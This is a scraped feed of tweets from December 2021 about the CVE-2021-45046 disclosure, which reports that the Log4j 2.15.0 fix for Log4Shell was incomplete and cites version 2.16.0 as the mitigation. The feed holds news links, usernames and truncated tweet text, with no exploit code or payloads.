2021-12-14 19:24:11Post atualizado por causa da CVE-2021-45046: O caos do Log4Shell (com memes) https://t.co/V9hyYPR1kT https://anchisesbr.blogspot.com/2021/12/seguranca-o-caos-do-log4shell-com-memes.html?spref=twanchisesbr
2021-12-14 19:23:47Note that this flaw seems to be listed as CVE-2021-45046 ... as a denial of service (DOS) attack. Clearly we've rea… https://t.co/yRzX6i0cKi https://twitter.com/i/web/status/1470835088992743430wdormann
2021-12-14 19:16:06CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of s… https://t.co/sIM1O5U8Xh https://twitter.com/i/web/status/1470831223412912128oss_security
2021-12-14 19:14:54CVE-2021-45046 released. “It was found that the fix to address CVE-2021-44228 in #Apache #Log4j 2.15.0 was incomple… https://t.co/lQyuYBEoKV https://twitter.com/i/web/status/1470831814906368002SkipperSecurity
2021-12-14 19:11:15Important: Current information says CVE-2021-45046 is a DoS vuln that only works if "logging configuration uses a n… https://t.co/T90h0tU10P https://twitter.com/i/web/status/1470832671794384896arekfurt
2021-12-14 19:10:17also there's another log4j vulnerability was found (CVE-2021-45046), and a new release 2.16.0 that disables access… https://t.co/rSp1h2UZmD https://twitter.com/i/web/status/1470833321215205377eed3si9n
2021-12-14 19:03:45Log4j vulnerability is not dead yet!!! Please look at CVE-2021-45046: "It was found that the fix to address CVE-202… https://t.co/Gceb5iMT4g https://twitter.com/i/web/status/1470829721797947393anchisesbr
2021-12-14 18:43:11【2021/12/15 03:25追記】CVE-2021-45046の情報を追記しました。 #sios_tech #security #vulnerability #セキュリティ #脆弱性 #linux #java #log4j… https://t.co/RhlBPgaaeM https://twitter.com/i/web/status/1470824554927095809omokazuki
2021-12-14 18:32:15New CVE issued: CVE-2021-45046theprincessxena
2021-12-14 18:04:01Is this mean 2.15.0 isn’t enough to log4j fully...? We have another CVE-2021-45046 @TheHackersNews @BleepinComputer… https://t.co/A3x1JxMriY https://twitter.com/i/web/status/1470813980524306432imRiturajDeka
2021-12-14 17:53:28CVE-2021-45046 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain… https://t.co/wn8getoDls https://twitter.com/i/web/status/1470812115363672069CVEnew
2021-12-14 17:40:44@cyb3rops Apache just raised CVE-2021-45046 for this. Affecting Log4J 2.15.0, mitigated by 2.16.0 or removing JndiL… https://t.co/AIy71A89pn https://twitter.com/i/web/status/1470809867640360967benmontour
2021-12-14 17:40:32CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of s… https://t.co/AXbw27l7Cm https://twitter.com/i/web/status/1470810116739977221gvarisco
2021-12-14 17:40:18CVE-2021-45046 issued for this: https://t.co/x2dqBpKqVM Still requires a specific local configuration, but treate… https://t.co/UXxqF67Vtq https://www.openwall.com/lists/oss-security/2021/12/14/4 https://twitter.com/i/web/status/1470810367467134984jschauma
2021-12-14 17:22:57CVE-2021-45046 : It was found that the fix to address CVE-2021-44228 in #Apache Log4j 2.15.0 was incomplete in cert… https://t.co/1fcCW4aatl https://twitter.com/i/web/status/1470801550343872514CVEreport